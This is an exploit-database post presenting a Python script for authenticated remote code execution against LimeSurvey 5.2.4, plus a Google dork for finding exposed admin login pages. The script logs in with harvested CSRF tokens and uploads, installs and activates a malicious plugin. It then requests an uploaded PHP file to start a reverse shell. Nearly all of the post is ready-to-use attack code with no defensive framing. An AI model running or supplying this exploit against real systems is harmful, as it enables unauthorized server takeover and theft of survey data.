Saturday, December 11, 2021

LimeSurvey 5.2.4 Remote Code Execution

# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Exploit Author: Y1LD1R1M
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2021.3
# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

#!/usr/bin/python
# -*- coding: utf-8 -*-


import requests
import sys
import warnings
from bs4 import BeautifulSoup

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
print("_______________LimeSurvey RCE_______________")
print("")
print("")
print("Usage: python exploit.py URL username password port")
print("Example: python exploit.py http://192.26.26.128 admin password 80")
print("")
print("")
print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==")
print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")
print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==")
print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")
print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==")
print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==")
print("")
print("")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
port = sys.argv[4]

req = requests.session()
print("[+] Retrieving CSRF token...")
loginPage = req.get(url+"/index.php/admin/authentication/sa/login")
response = loginPage.text
s = BeautifulSoup(response, 'html.parser')
CSRF_token = s.findAll('input')[0].get("value")
print(CSRF_token)
print("[+] Sending Login Request...")

login_creds = {
"user": username,
"password": password,
"authMethod": "Authdb",
"loginlang":"default",
"action":"login",
"width":"1581",
"login_submit": "login",
"YII_CSRF_TOKEN": CSRF_token
}
print("[+]Login Successful")
print("")
print("[+] Upload Plugin Request...")
print("[+] Retrieving CSRF token...")
filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS
login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)
UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")
response = UploadPage.text
s = BeautifulSoup(response, 'html.parser')
CSRF_token2 = s.findAll('input')[0].get("value")
print(CSRF_token2)
Upload_creds = {
"YII_CSRF_TOKEN":CSRF_token2,
"lid":"$lid",
"action": "templateupload"
}
file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)
UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")
response = UploadPage.text
print("[+] Plugin Uploaded Successfully")
print("")
print("[+] Install Plugin Request...")
print("[+] Retrieving CSRF token...")

InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")
response = InstallPage.text
s = BeautifulSoup(response, 'html.parser')
CSRF_token3 = s.findAll('input')[0].get("value")
print(CSRF_token3)
Install_creds = {
"YII_CSRF_TOKEN":CSRF_token3,
"isUpdate": "false"
}
file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)
print("[+] Plugin Installed Successfully")
print("")
print("[+] Activate Plugin Request...")
print("[+] Retrieving CSRF token...")
ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")
response = ActivatePage.text
s = BeautifulSoup(response, 'html.parser')
CSRF_token4 = s.findAll('input')[0].get("value")
print(CSRF_token4)
Activate_creds = {
"YII_CSRF_TOKEN":CSRF_token4,
"pluginId": "1" # CHANGE THIS
}
file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds)
print("[+] Plugin Activated Successfully")
print("")
print("[+] Reverse Shell Starting, Check Your Connection :)")
shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS

 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore